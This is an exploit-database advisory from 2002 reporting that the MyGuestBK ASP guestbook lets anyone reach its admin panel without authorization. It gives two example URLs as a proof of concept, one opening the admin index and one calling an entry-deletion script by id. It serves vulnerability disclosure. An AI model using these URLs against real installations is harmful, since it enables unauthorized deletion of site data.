MyGuestBK - Unauthorized Admin Panel Access

EDB-ID:

22437

CVE:



Author:

Over_G

Type:

webapps


Platform:

ASP

Date:

2002-03-27


source: https://www.securityfocus.com/bid/7213/info

MyGuestBk has been reported vulnerable to unauthorized Admin Panel Access.

It has been reported that an attacker may access arbitrary MyGuestBK administrative functions through the MyGuestBK administration panel without prior authorization.

http://www.example.com/myguestBk/admin/index.asp
http://www.example.com/myguestBk/admin/delEnt.asp?id=NEWSNUMBER